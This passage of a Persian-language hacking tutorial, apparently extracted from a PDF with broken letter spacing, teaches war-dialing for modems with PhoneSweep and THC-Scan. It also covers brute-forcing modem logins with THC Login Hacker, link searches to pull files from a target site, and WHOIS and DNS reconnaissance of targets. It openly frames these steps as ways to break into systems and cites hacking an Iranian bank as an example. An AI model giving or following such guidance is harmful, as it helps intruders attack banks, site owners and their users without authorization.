ه ﺎ ﺏ ﺪ ﻧ ﺸﺪ‬ ‫ﮐﻪ !!! از ﮐﺎرایﯽ هﺎی ایﻦ روش ﻣﯽ ﺕﻮان ﺏﻪ هﮏ ﺏﺎﻧﮏ ﺕﺠﺎرت ﻧﺎم ﺏﺮد در وﻃﻦ ﺧﻮدﻣﺎن و‪ ...‬ﻓﮑﺮ ﻧﮑﻨﻴﺪ یﮏ دﻓﻌﻪ ﻣﺴﺨﺮﻩ اﺱﺖ ایﻦ روش ﺏﻠﮑ ﻪ‬ ‫ﺏﺪاﻧﻴﺪ اﮔﺮ ﺟﺎیﯽ را ﺏﻪ ﻃﻮر اﺱﺎﺱﯽ ﺏﺨﻮاهﻴﺪ هﮏ ﮐﻨﻴﺪ ایﻦ روش ﺟﺰو ‪ ٣‬ﮔﺰیﻨﻪ اول اﺱﺖ ‪.‬‬ ‫اﮔﺮ از ﺧﻂ ﻓﺮﻣﺎن ﻣﺜﻞ ﺧﻴﻠﯽ از ﻣﺎﻣﺎﻧﯽ هﺎ ﻣﻴﺘﺮﺱﻴﺪ ﺏﺪاﻧﻴﺪ یﮏ ﺏﺮﻧﺎﻣﻪ ﮔﺮاﻓﻴﮑﯽ در ﭘﻴ ﺖ ه ﻢ ﺏ ﺮای ای ﻦ ﮐ ﺎر ه ﺴﺖ ﮐ ﻪ ﺧﻴﻠ ﯽ ﺧﻴﻠ ﯽ ﺱﻮﺱ ﻮﻟﯽ وﻟ ﯽ‬ ‫ﺧﺎﻟﯽ از ﻟﻄﻒ ﻧﻴﺴﺖ ﺕﺠﺮﺏﻪ ﮐﺎر ﮐﺮدﻧﺶ ﺏﻪ ﻧﺎم ‪ PhoneSweep‬ﮐﻪ از ﺱﺎیﺖ ‪ www.sanstorm.com‬ﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﻴﺮیﺪ اش‪.‬‬ ‫ﺧﻮب ﺕﺎ ﺡﺎﻻ دو روش ﺏﻪ ﺷﻤﺎ یﺎد دادم ﺏﺮای ﭘﻴﺪا ﮐﺮدن ﻣﻮدم هﺎی ﻓﻌﺎل و ‪ +‬روش ﻣﺦ ‪ ...‬ﻣﻴﺸﻮد ﺱﻪ ‪ ٣‬روش‪.‬‬ ‫ﺡﺎﻻ ﺏﻪ ﻣﻮدم وﺻﻞ ﻣﻴﺸﻮیﻢ اﮔﺮ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﮐﺎرﺏﺮ و‪ ..‬ﻧﺨﻮاﺱﺖ ﮐﻪ هﻠﻮ اﮔﺮ ﺧﻮاﺱﺖ ﮐﻪ ﺡﺎﻟﻴﺶ ﻣﻴﮑﻨﻴﻢ ﮐﻪ ای ﻦ ه ﻢ راﻩ دارد و ﺁن ه ﻢ ﺡ ﺪس‬ ‫زدن ﮐﻠﻤﻪ ﻋﺒﻮر!!! و یﺎ ورود ﺏﻪ زور ) ‪ ( Brute Force‬اﺱﺖ ‪.‬ﺏﺮای اﻧﺠﺎم ایﻨﮑﺎر روش اول ﮐﻪ هﻤﺎن ﺡﺪس زدن اﺱﺖ ﮐﻪ ﻣﺸﺨﺺ اﺱﺖ ﺏﺎیﺪ ﺏﺎ‬ ‫ﺕﻮﺟﻪ ﺏﻪ ﺷﺮایﻂ هﺪف ﮐﻠﻤﻪ ﺡﺪس زدﻩ ﺷﻮد ﮐﻪ در اﺏﺘﺪای ﻣﻘﺎﻟﻪ دیﺪیﺪ ایﻦ ﮐﻠﻤﻪ هﺎ ﭼﻪ ﺏﻮد ‪.‬‬ ‫اﮔﺮ ﺡﺪس زدﻩ ﻧﺸﺪ ﻧﮕﺮان ﻧﺒﺎﺷﻴﺪ ﻣﺎ از ﻧﺮم اﻓﺰارهﺎی ﺕﺴﺖ ﮐﻠﻤﻪ ﻋﺒﻮر اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﻣﺜﻞ ‪ THC Login Hacker :‬ﮐﻪ ﮐﺎرایﯽ اش ﺧﻮب اﺱﺖ‬ ‫ﻣﻦ ﺁن را اﻧﺪر زﻣﺎن ﻗﺪیﻢ از ﺁدرس ‪ HTTP://THC.INFERNO.TUSCULUM.EDU/ :‬ﮔ ﺮﻓﺘﻢ اﮔ ﺮ ﺏ ﻪ ای ﻦ ﺁدرس ﻧﺘﻮاﻧ ﺴﺘﻴﺪ ﺏﺮوی ﺪ ﻣ ﻦ‬ ‫ﺷﻤﺎ را ﺏﻪ ﮔﻮ ﮔﻞ ﻣﻴﺴﭙﺎرم‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٣‬‬

‫ﮐﺎر ﺏﺎ ایﻦ ﻣﺪل از ﻧﺮم اﻓﺰارهﺎی هﮏ ﻣﺜﻞ هﻤﻴﻦ هﺎ اﺱﺖ‪.‬زیﺎد ﻓﺮق ﻧﻤﯽ ﮐﻨﺪ ﭘﺲ ﻧﺘﻴﺠﻪ ﻣﻴﮕﻴﺮیﻢ ﻣﻦ ﻣﺪل دیﮕﺮی را ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ !‬ ‫ی ﮏ ﻧﮑﺘ ﻪ ﺧﻴﻠ ﯽ ﮐ ﺎرﺏﺮدی اﮔ ﺮ ﻣﻮﻗ ﻊ اﺟ ﺮای ‪ THC-Scan‬ﭘﻴﻐ ﺎم ﺧﻄ ﺎی ‪ Run time 200‬را ﮔﺮﻓﺘﻴ ﺪ ﻻزم اﺱ ﺖ ﺱ ﻮرس ﺏﺮﻧﺎﻣ ﻪ را ﺏ ﺎ ی ﮏ‬ ‫ﮐﺎﻣﭙﺎیﻠﺮ ﭘﺎﺱﮑﺎل دوﺏﺎرﻩ ﮐﺎﻣﭙﺎیﻞ ﮐﻨﻴﺪ یﺎ ﺕﺤﺖ یﮏ ﺷﺒﻴﻪ ﺱﺎز ‪ Dos‬ﻣﺜﻞ ‪ doscmd‬و یﺎ ‪ dosemu‬اﺟﺮا ﮐﻨﻴﺪ‪.‬‬ ‫‪ -٣‬ﺟﺴﺘﺠﻮ در وب ﺑﻪ دﻧﺒﺎل اﻃﻼﻋﺎت ﺵﺒﮑﻪ هﺪف‪:‬‬ ‫ایﻦ ﮐﺎر در ﺷﺮایﻂ ﺧﺎﺻﯽ ﻻزم ﮐﻪ اﻧﺠﺎم ﺏﺸﻮد در ﺏﻌﻀﯽ از ﻣﺘﺪهﺎی و یﺎ ﻓﺎرﺱﯽ ﺷﻴﻮﻩ هﺎ هﮏ ﮐﻪ ﺷﻤﺎ ﺏﺎی ﺪ از ی ﮏ ﻟﻴﻨ ﮏ ﺧ ﺎص ﺏ ﻪ ی ﮏ ﺱ ﺎیﺖ‬ ‫ﻣﺘﺼﻞ ﺏﺸﻮیﺪ ﺕﺎ ﺏﻌﻀﯽ از اﺧﺘﻴﺎرات ﺏﻪ ﺷﻤﺎ دادﻩ ﺷﻮد و‪...‬‬ ‫ﻣﺜﻼ ﺱﺎیﺖ ﮐﺮوز را ﺏﻪ دﻧﺒﺎل ﻟﻴﻨﮏ هﺎ یﺶ ﺟﺴﺘﺠﻮ ﻣﻴﮑﻨﻴﻢ و ﺏﻪ ایﻦ ﻧﺘﻴﺠﻪ ﻣﻴﺮﺱﻴﻢ ﮐﻪ ﻓﺎیﻠﻬﺎی ﻗﺎﺏﻞ داﻧﻠ ﻮد ﺁن در ﺱ ﺎیﺘﯽ ﺏ ﻪ ﻧ ﺎم ﮐﺮﻣ ﺎن هﮑ ﺮ اﺱ ﺖ‬ ‫‪.‬ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ایﻦ ﻣﺴﺌﻠﻪ‪ ،‬دیﮕﺮ ﻋﻀﻮ ﺷﺪن و درﺟﻪ ﮔﺮﻓﺘﻦ و‪ ...‬ﻣﻌﻨﺎیﯽ ﻧﺪارد و ﻣﺎ هﺮ ﭼﯽ ﺏﺨﻮاهﻴﻢ از ﺁن ﺱ ﺎیﺖ ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ روﺷ ﻬﺎیﯽ ﮐ ﻪ ﺏﻌ ﺪا ی ﺎد‬ ‫ﻣﻴﺪم ﺏﺮ ﻣﻴﺪاریﻢ‪.‬‬ ‫ﻣﺜﺎل در ﺱﺎیﺖ ‪ ALTAVISTA‬ﻣﯽ ﻧﻮیﺴﻴﻢ ‪:‬‬ ‫‪Link: www.crouz.com‬‬ ‫ﺏﻌﺪ ﻧﺘﺎیﺠﯽ را ﮐﻪ ﺷﻤﺎل ﺕﻤﺎﻣﯽ ﺱﺎیﺖ هﺎی وﺏﯽ اﺱﺖ ﮐﻪ ﺏﻪ ایﻦ ﻟﻴﻨﮏ ارﺟﺎع دادﻩ ﺷﺪﻩ را ﻣﯽ ﺏﻴﻨﻴﻢ‪.‬‬ ‫ﻓﻌﻼ در ایﻦ ﻣﻮرد ﺏﺲ اﺱﺖ ﻣﻄﻠﺐ زیﺎد اﺱﺖ ﻣﻦ هﻢ ﺡﻮﺻﻠﻪ ﻧﻮﺷﺘﻦ ﻧﺪارم !!! ﺏﺒﺨﺸﻴﺪ‪.‬‬ ‫اﻩ اﻩ اﻩ اﻩ اﺻﻼ هﻮا ﺱﻢ ﻧﺒﻮد یﮏ ﻣﻄﻠﺐ ﻣﻬﻢ در ایﻦ ﺏﺎرﻩ اﺱﺖ و ﺁن هﻢ ‪ Who is‬اﺱﺖ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪.‬‬ ‫اﻟﺒﺘﻪ ﺁﻗﺎی ﺻﻤﺪی در ﻣﻘﺎﻻت ﺧﻮد ﺕﻮﺽﻴﺢ دادن!!!!!!!!! ﮐﻪ ﻣﺎ هﻢ ﺏﺮای ﮐﺎﻣﻞ ﺏﻮدن ﻣﻘﺎﻟﻪ دوﺏﺎرﻩ ﻣﻴﮕﻮیﻢ ‪.‬‬ ‫ﻣﺎ ایﻦ ﻋﻤﻞ را ﺏﺮای یﺎﻓﺘﻦ اﻃﻼﻋﺎﺕﯽ از ﻗﺒﻴﻞ ﺁدرس هﺎی ‪ ، IP‬ﻧﺎﻣﻬﺎی ﺡﻮزﻩ ) ‪ ( Domain Name‬اﻃﻼﻋﺎﺕﯽ در ﺏ ﺎرﻩ ﻣ ﺴﺌﻮل ﺷ ﺒﮑﻪ ﺁدرس او و‬ ‫ﺷﻤﺎرﻩ ﺕﻠﻔﻦ و ﺱﺎل ﺙﺒﺖ ‪ domain‬و زﻣﺎن اﻧﻘﻀﺎی ﺁن و‪...‬‬ ‫ﻣﯽ ﺧﻮاهﻢ اول یﮏ ﻧﻤﺎی ﮐﻠﯽ ﺏﻪ ﺷﻤﺎ ﺏﺪهﻢ ﺏﻌﺪ ریﺰ ﺟﺰﺋﻴﺎت را ﺏﮕﻢ ‪.‬‬ ‫در ﺷﺒﮑﻪ هﺎی ﺏﺰرگ ) ﺕﺎﮐﻴﺪ ﻣﻴﮑﻨﻢ ﺏﺰرگ در ﺷﺒﮑﻪ ﮐﻮﭼﮑﺘﺮ ﺕﻤﺎم ﮐﺎرهﺎ را یﮏ ﻣﺎﺷﻴﻦ اﻧﺠﺎم ﻣﻴﺪه ﺪ ( ﺏ ﺮای اﻣﻨﻴ ﺖ و ﭘﺎی ﺪاری ﺱﻴ ﺴﺘﻢ ) ﻣﻨﻈ ﻮر‬ ‫ﻣﺠﻤﻮﻋﻪ ( یﮏ ﺁدرس ﺡﻮزﻩ ﮐﻠﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ ‪ ،‬ﮐﻪ ﺁن ﺏﻪ ﮐﻞ ﺷﺒﮑﻪ اﺷﺎرﻩ ﻣﻴﮑﻨﺪ ﻧﻪ ﻣﺎﺷﻴﻦ ﺧﺎﺻﯽ ﻣﺜﻼ ﻣﺎیﮑﺮوﺱﺎﻓﺖ یﮏ ﺁدرس ﮐﻠﯽ دارد و ه ﺮ‬ ‫ﮐﺪام از زیﺮ ﺷﺒﮑﻪ هﺎ یﺶ یﮏ ﺁدرس یﮑﺘﺎ ﺧﺎص دارﻧﺪ ﻣﺜﻞ ﺱﻴﺴﺘﻢ ایﻤﻴﻞ و ﺱﻴﺴﺘﻢ ‪ FTP‬و ‪ ...‬ایﻦ ﻣﺎﺷﻴﻨﻬﺎ ﮐﻪ هﺮ ﮐﺪام ﮐﺎر ﻣﺠﺰایﯽ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ‬ ‫ﻧﺎﻣﯽ ﻣﺸﺎﺏﻪ ‪ xxxxxxxx.microsoft.com‬دارد ﮐﻪ ﺏﻪ ﺟﺎی ﺡﺮوف ‪ x‬ﻧﺎم ﻣﺎﺷﻴﻦ ﻗﺮار ﻣﻴﮕﻴﺮد‪.‬‬ ‫ﺏﺮای ایﻨﮑﻪ ایﻦ ﻣﺎﺷﻴﻨﻬﺎ ﺏﺘﻮاﻧﻨﺪ در ﺷﺒﮑﻪ ) ﻣﻨﻈﻮر هﻢ ایﻨﺘﺮﻧﺖ و ﺷﺒﮑﻪ داﺧﻠﯽ( اﺱﺖ ﮐﺎر ﺏﮑﻨﻨﺪ ﺏﺎیﺪ هﻤ ﺎﻧﻄﻮر ﮐ ﻪ ﮔﻔﺘ ﻪ ﺷ ﺪ ی ﮏ ﺁدرس یﮑﺘ ﺎ داﺷ ﺘﻪ‬ ‫ﺏﺎﺷﻨﺪ ﺏﺮای ایﻦ ﮐﺎر از یﮏ ﺱﺮویﺲ دهﻨﺪﻩ ﺧﺎص ﺏﻪ ﻧﺎم ‪ DNS‬ﺏﺎیﺪ ﺏ ﺮ روی ی ﮏ ﻣﺎﺷ ﻴﻦ ﻧ ﺼﺐ ﮐﻨﻨ ﺪ و روی ﺁن ﻣﺎﺷ ﻴﻦ ﺁدرﺱ ﻬﺎ و ‪ IP‬ﺷ ﺒﮑﻪ را‬ ‫ﺙﺒﺖ ﮐﺮد ﺏﻌﺪ ای ﻦ ﺁدرس ﻣﺎﺷ ﻴﻦ ‪ DNS‬را ﮐ ﻪ ﺁدرس ه ﺎی زی ﺮ ﺷ ﺒﮑﻪ را دارد در ﺏﺎﻧ ﮏ اﻃﻼﻋ ﺎت ﺟﻬ ﺎﻧﯽ ‪ DNS‬ﮐ ﻪ ﺁدرس ﮐﻠ ﯽ را درﺁن ﺙﺒ ﺖ‬ ‫ﮐﺮدﻩ اﻧﺪ ﺙﺒﺖ ﻣﻴﺸﻮد و ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ایﻦ روش اﻣﮑﺎن دﺱﺘﺮﺱﯽ ﺏﻪ زیﺮ ﺷﺒﮑﻪ و اﻣﮑﺎﻧﺎت ﺱﺎیﺖ ﻣﻴﺒﺎﺷﺪ‪.‬‬ ‫ﮐﻪ ﻣﺎ ﺏﺎ ﺕﻤﺎس ﺏﺎ ﺁن ‪ DNS‬اﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ ﻣﺎﺷﻴﻨﻬﺎ و ﮐﺎر ﺁﻧﻬﺎ و ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار ﺱﺮویﺲ دهﻨﺪﻩ روی هﺮ ﻣﺎﺷﻴﻦ و ‪ ...‬ﺏﺪﺱ ﺖ ﻣ ﯽ ﺁوری ﻢ ﮐ ﻪ‬ ‫اول ﺏﺎیﺪ ﺧﻮد ﺁن ﮐﺎﻣﭙﻴﻮﺕﺮ ‪ DNS‬و ﺁدرس ‪ IP‬ﺁﻧﺮا ﭘﻴﺪا ﮐﻨﻴﻢ ﮐﻪ ﻣﺎ ‪ WHOIS‬را ﺏﺮای ایﻦ ﮐﺎر ﻣﻴﺨﻮاهﻴﻢ !!‬ ‫ﺧﻮب ایﻦ هﻢ یﮏ ﻧﻤﺎی ﮐﻠﯽ در ایﻦ ﺏﺎرﻩ و ﻣﻄﻠﺐ ﺏﻌﺪ‪.‬‬ ‫ﮐﺴﺐ اﻃﻼﻋﺎت در ﻣﻮرد ﻧﺎﻣﻬﺎی ﺡﻮزﻩ )‪ ( Domain Name Server‬ﺏﺎ ﭘﺴﻮﻧﺪ ‪ org‬و ‪ com‬و ‪: net‬‬ ‫ﻗﺎﺏﻞ ذﮐﺮ اﺱﺖ ﺕﺎ ﻗﺒﻞ از ﺱﺎل ‪ ١٩٩٩‬ﺷﻮﻓﺮی ایﻦ ﮐ ﺎر ﻣﻨﺤ ﺼﺮا ﻣﺘﻌﻠ ﻖ ﺏ ﻪ ﺷ ﺮﮐﺖ ‪ Network Solutions‬ﺏ ﻮد‪ .‬در ای ﻦ ﺱ ﺎل )‪ (١٩٩٩‬ﺕ ﺼﻤﻴﻢ‬ ‫ﮔﺮﻓﺖ ﺷ ﺪ ﺕﻮﺱ ﻂ ‪ ICANN‬ﮐ ﻪ ﺙﺒ ﺖ ﻧ ﺎم را از ﺡﺎﻟ ﺖ اﻧﺤ ﺼﺎری ﺧ ﺎرج ﮐ ﺮدﻩ و ﺕﺤ ﺖ ی ﮏ روال ﻗ ﺎﻧﻮﻧﯽ در ﺁورد و ﺏ ﻪ ﺷ ﺮﮐﺘﻬﺎی واﺟ ﺪ ﺷ ﺮایﻂ‬ ‫واﮔﺬار ﻧﻤﺎیﺪ ‪.‬ﺏﺎ ایﻦ ﮐﺎر رﻗﺎﺏﺖ ﺧﻔﻨﯽ در ﮔﺮﻓﺖ ﮐﻪ ﺏﺎﻋﺚ ﺷﺪ ﺕﺎ ﺏﻌﻀﯽ ﺷﺮﮐﺘﻬﺎ ﺏ ﺎ دریﺎﻓ ﺖ ﻣﻘ ﺪاری ﻓ ﻀﺎ از ﺱ ﺮور وب ﺱ ﺎیﺖ ﺷ ﻤﺎ ‪ ،‬رایﮕ ﺎن ﻧ ﺎم‬ ‫ﺷﻤﺎ را ﺙﺒﺖ ﮐﻨﻨﺪ ) ﻗﺎﺏﻞ ﺕﻮﺟﻪ ﺏﺮ ﺏﭽ ﻪ ه ﺎیﯽ ﮐ ﻪ ﺷ ﺪیﺪ اﻧ ﺪ دﻧﺒ ﺎل وب ﺱ ﺎیﺖ ﻣﺠ ﺎﻧﯽ ه ﺴﺘﻨﺪ "اﻟﺒﺘ ﻪ ای ﻦ روش را ﺏﻄ ﻮر ﮐﺎﻣ ﻞ در ﻣﻘ ﺎﻻت ﺏﻌ ﺪی ه ﻢ‬ ‫ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺕﺎ ﺏﺪون ﺧﺎرج ﺷﺪن ﺡﺘﯽ یﮏ ریﺎل از ﺟﻴﺐ ﻣﺒﺎرک داری یﮏ وب ﺏﺎﺡﺎل ﺷﻮیﺪ " ( ‪.‬‬ ‫اوﻟﻴﻦ ﮔﺎم در ﺷﻨﺎﺱﺎیﯽ ﺻﺎﺡﺒﺎن یﮏ ﺁدرس ﺏﺎ ﭘﺴﻮﻧﺪهﺎی ﺏﺎﻻ رﻓﺘﻦ ﺏﻪ یﮑﯽ از ﺱﺎیﺘﻬﺎی ‪:‬‬ ‫‪HTTP://WWW.SAMSPADE.ORG/T/WHOIS?A=TRU2.COM‬‬ ‫‪HTTP://WWW.INTERNIC.NET/WHOIS.HTML‬‬ ‫‪HTTP://WWW.ARIN.NET‬‬

‫ﻧﮑﺘﻪ در ﺁدرس اوﻟﯽ ﺏﻪ ﺟﺎی ‪ TUR2.COM‬ﺁدرس ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﺏﻨﻮیﺴﻴﺪ‬ ‫اﺱﺖ‪ .‬اﻃﻼﻋﺎﺕﯽ ﮐﻪ ﺏﻌﺪ از وارد ﮐﺮدن ﻧﺎم ﺱﺎیﺖ ﺏﻪ ﺷﻤﺎ دادﻩ ﻣﻴﺸﻮد ﻋﺒﺎرﺕﻨﺪ از‪:‬‬ ‫‪ -١‬ﻧﺎم ﺷﺮﮐﺖ ﺙﺒﺖ ﮐﻨﻨﺪﻩ ﻧﺎم ) ‪. ( Registrar‬‬ ‫‪ -٢‬ﻧﺎم ﺱﺮویﺲ دهﻨﺪﻩ ‪. Whois‬‬ ‫‪ -٣‬ﻧﺎم ﺱﺮویﺲ دهﻨﺪﻩ هﺎی ﻧﺎم ﺷﺮﮐﺖ یﺎ ﻣﻮﺱﺴﻪ ﺻﺎﺡﺐ ﻧﺎم‪.‬‬ ‫ﺏﻌﺪ از ﺏﺪﺱﺖ ﺁوردن ایﻦ اﻃﻼﻋﺎت ﺏﻪ ﺱﺎیﺖ ﺷﺮﮐﺖ ﺙﺒﺖ ﮐﻨﻨﺪﻩ اﻃﻼﻋﺎت رﻓﺘﻪ و ﺁﻧﺠﺎ ایﻦ ﻋﻤﻞ را ﺕﮑ ﺮار ﻣﻴﮑﻨ ﻴﻢ ﺕ ﺎ اﻃﻼﻋ ﺎت ﺏﻴ ﺸﺘﺮی دﺱ ﺖ ﭘﻴ ﺪا‬ ‫ﮐﻨﻴﻢ ﺡﺎﻻ اﻃﻼﻋﺎت را یﮏ ﺟﺎیﯽ ذﺧﻴﺮﻩ ﮐﻨﻴﺪ ﺕﺎ ﺏﮕﻢ ﺏﻌﺪا ﺏﺎ ﻣﻴﻞ ﺏﻪ ﻣﻴﻞ ﺁن ﭼﻪ ﮐﺎر ﺏﺎیﺪ ﮐﺮد ﮐﻪ ﺧﻴﻠﯽ ﺏﻪ درد ﻣﯽ ﺧﻮرد ‪.‬‬ ‫ﺧﻮب یﮏ ﺱﻮال ﻣﻬﻢ ایﻨﺠﺎ ﻣﻄﺮح ﻣﻴﺸﻮد ﮐﻪ اﮔﺮ ﭘﺴﻮﻧﺪ ﺱﺎیﺖ ﻣﻮرد ﻧﻈﺮ ﻣﺎ ﭘﺴﻮﻧﺪهﺎی ﺏﺎﻻ ﻧﺒﻮد ﭼﮑ ﺎر ﮐﻨ ﻴﻢ؟ ﺧ ﻮب در ﺟ ﻮاب ای ﻦ ﺱ ﻮال ﮐﻠ ﯽ و‬ ‫ﺟﺎﻣﻊ ﺟﻮاب ﻣﻴﺪهﻢ ﺕﺎ ﻣﺸﮑﻠﯽ ﺏﺮای ﺷﻤﺎ ﭘﻴﺶ ﻧﻴﺎیﺪ را ﺡﻞ ایﻦ ﻣﺴﺌﻠﻪ ایﻦ اﺱﺖ ﮐﻪ ﺏﻪ ﺱﺎیﺖ‪:‬‬ ‫‪HTTP://WWW.ALLWHOIS.COM/HOME.HTML‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٤‬‬

‫رﻓﺘﻪ در ایﻦ ﺁدرس ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ اﻃﻼﻋﺎت ﻣﺮﺏﻮط ﺏﻪ ﺙﺒﺖ ﮐﻨﻨﺪﻩ ﻧﺎم ﺏﻴﺶ از ‪ ۶٠‬ﮐﺸﻮر ﺟﻬﺎن را ﺏﺒﻴﻨﻴﺪ از ﺟﻤﻠ ﻪ ‪. ir‬اﻟﺒﺘ ﻪ ﻣﺠﻤﻮﻋ ﻪ ﺁدرﺱ ﻬﺎی ‪NIC‬‬ ‫هﻢ ﺧﻮب اﺱﺖ و راﻩ ﮔﺸﺎ ﻣﺜﻞ‪:‬‬ ‫‪http://whois.nic.ir/‬‬ ‫‪http://whois.nic.gov‬‬ ‫‪http://whois.nic.mil/‬‬ ‫و ‪....‬‬ ‫ﺧﻮب ﻣ ﺎ ﺡ ﺎﻻ ی ﮏ ﺱ ﺮی اﻃﻼﻋ ﺎت ﺏﺪﺱ ﺖ ﺁوردﻩ ای ﻢ ﻣﺜ ﻞ ﺷ ﺮﮐﺖ ﺙﺒ ﺖ ﮐﻨﻨ ﺪﻩ ﺁدرس ‪ ،‬ﺏ ﻪ ﺱ ﺮاغ ﺁن ﻣﻴ ﺮویﻢ و ﻣ ﺴﺘﻘﻴﻤﺎ در ﺁن ﺟ ﺎ ی ﮏ ‪Whois‬‬ ‫اﺱﺎﺱﯽ ﻣﻴﮑﻨﻴﻢ ﺕﺎ اﻃﻼﻋﺎت ﺏﻴﺸﺘﺮی را ﺏﺪﺱﺖ ﺏﻴﺎوریﻢ اﻃﻼﻋﺎﺕﯽ ﮐﻪ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ﺏﻴﺶ از ‪ %٩٠‬اوﻗﺎت ﻋﺎﻟﯽ اﺱﺖ ﺡﺎل ﻣﻌﻤﻮﻻ ﺏﻪ ﻣﺎ ﻣﯽ ﮔﻮیﺪ ‪:‬‬ ‫‪ -١‬ﺁدرس ‪ IP‬ﺱﺎیﺖ یﺎ ﺏﻪ ﻧﻮﻋﯽ ﻣﻴﺸﻮد ﮔﻔﺖ ﺁدرس ‪ http server‬را ﻣﻴﮕﻮیﺪ ‪.‬‬ ‫‪ -٢‬ﺁدرس و ﻣﺸﺨﺼﺎت ‪ DNS‬را ﮐﻪ ﺧﻴﻠﯽ ﺏﺪرد ﻣﻴﺨﻮرد‪.‬‬ ‫‪-٣‬ﺁدرس و ﻣﺸﺨﺼﺎت ﺷﺨﺼﯽ ﮐﻪ ﺁدرس را در ﺷﺒﮑﻪ ﺙﺒﺖ ﮐﺮدﻩ اﻟﺒﺘﻪ ﻧﻤﻴﺸﻮد درﺏﺎرﻩ ﺻﺤﺖ ﺁن ﻧﻈﺮ داد‪ ).‬اﮐﺜﺮا ﻣﻬﻢ ﻧﻴﺴﺖ(‬ ‫‪ NIC handle -۴‬ﮐﻪ یﻌﻨﯽ ی ﮏ ﺷﻨﺎﺱ ﻪ دﻩ ﮐ ﺎراﮐﺘﺮی اﺱ ﺖ ﮐ ﻪ ﺏ ﻪ ﻋﻨ ﻮان ﮐ ﺪ یﮑﺘ ﺎ رﮐ ﻮرد اﻃﻼﻋ ﺎت ﻣﺮﺏﻮﻃ ﻪ را در ﺏﺎﻧ ﮏ اﻃﻼﻋ ﺎﺕﯽ ‪Whois‬‬ ‫ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﻣﻴﮕﻢ ﭼﮑﺎر اﺱﺖ ﺏﻌﺪا ‪.‬‬ ‫یﮏ ﻧﮑﺘﻪ اﮔﺮ ﺏﻴﺶ از یﮏ ‪ IP‬و ﺁدرس ﺏﺮای ‪ DNS‬ﭘﻴﺪا ﮐﺮدیﺪ ﺕﻌﺠﺐ ﻧﮑﻨﻴﺪ ﻣﻌﻤﻮﻻ ﺱﺎیﺖ ه ﺎی ﺏ ﺰرگ ﭼﻨ ﺪ ﺕ ﺎ ﺁدرس ‪ DNS‬دارﻧ ﺪ ﮐ ﻪ اﮔ ﺮ ﺧ ﺪا‬ ‫ﺧﻮاﺱﺖ اوﻟﯽ ﭘﮑﻴﺪ دوﻣﯽ ﮐﺎرا را اﻧﺠﺎم ﺏﺪهﺪ و ﺱﻴﺴﺘﻢ ﻧﺨﻮاﺏﺪ ﻣﺎ ﺏﺮای ﮐﺎرهﺎیﻤﺎن ﻣﻌﻤﻮﻻ از اوﻟﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ وﻟﯽ اﮔﻪ ﺏﻪ هﺮ دﻟﻴﻠﯽ ﺟ ﻮاب ﻧ ﺪاد‬ ‫از ﺏﻌﺪی هﺎ ﺏﻪ ﺕﺮﺕﻴﺐ ﺷﻤﺎرﻩ اش اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺧﻮب ایﻨﺎ ﺏﺎیﺪ هﻤﻴﺸﻪ ﺏﺮوز ﺏﺎﺷﻦ ﺕﺎ ﺁدرس هﺎ درﺱﺖ ﮐﺎر ﮐﻨﺪ ﺏﺮای هﻤﺎهﻨﮕﯽ و ﺏﻪ روز ﺏﻮدن ﺁﻧﻬﺎ‬ ‫از ﺁن دﻩ ﮐ ﺎراﮐﺘﺮ اﺱ ﺘﻔﺎدﻩ ﻣﻴ ﺸﻮد ﻣﻌﻤ ﻮﻻ ﺏ ﺮای ﺕﺒ ﺎدل اﻃﻼﻋ ﺎت از ﭘ ﻮرت ‪ udp ۵٣‬اﺱ ﺘﻔﺎدﻩ ﻣ ﯽ ﮐﻨﻨ ﺪ ﮐ ﻪ ﺏ ﺎ ی ﮏ ‪ telnet‬ﺱ ﺎدﻩ ﻣﻴ ﺸﻮد ﮐﻠ ﯽ‬ ‫اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺁورد اﻟﺒﺘﻪ راﻩ اﺻﻠﯽ اش اﺱﺘﻔﺎدﻩ ار ﻓﺮﻣﺎن ‪ nsllokup‬اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﭼﻪ ﺟﻮری ﮐﺎر ﻣﻴﮑﻨﺪ ‪.‬‬ ‫ﻣﺜﺎل ‪ :‬ﻧﺪاریﻢ ﻓﻌﻼ !!!!‬ ‫زﻧﮓ ﺕﻔﺮﻳﺢ!!!‬ ‫یﮏ ﻧﮑﺘﻪ ﮐﻮﭼﻮﻟﻮ اﺱﺖ ﮐﻪ ﮐﻤﯽ ﺏﺎ ﺡﺎل اﺱﺖ داﻧﺴﺘﻦ اش هﻤﺎن ﻃﻮر ﮐ ﻪ ﻓﻬﻤﻴﺪی ﺪ ﻓﺮایﻨ ﺪ ﺁوردن ی ﮏ ﺻ ﻔﺤﻪ از ی ﮏ ﺱ ﺎیﺖ ﮐﻤ ﯽ وﻗ ﺖ ﮔﻴ ﺮ اﺱ ﺖ‬ ‫ﺏﺮای ﺱﺮﻋﺖ ﺏﺨﺸﻴﺪن 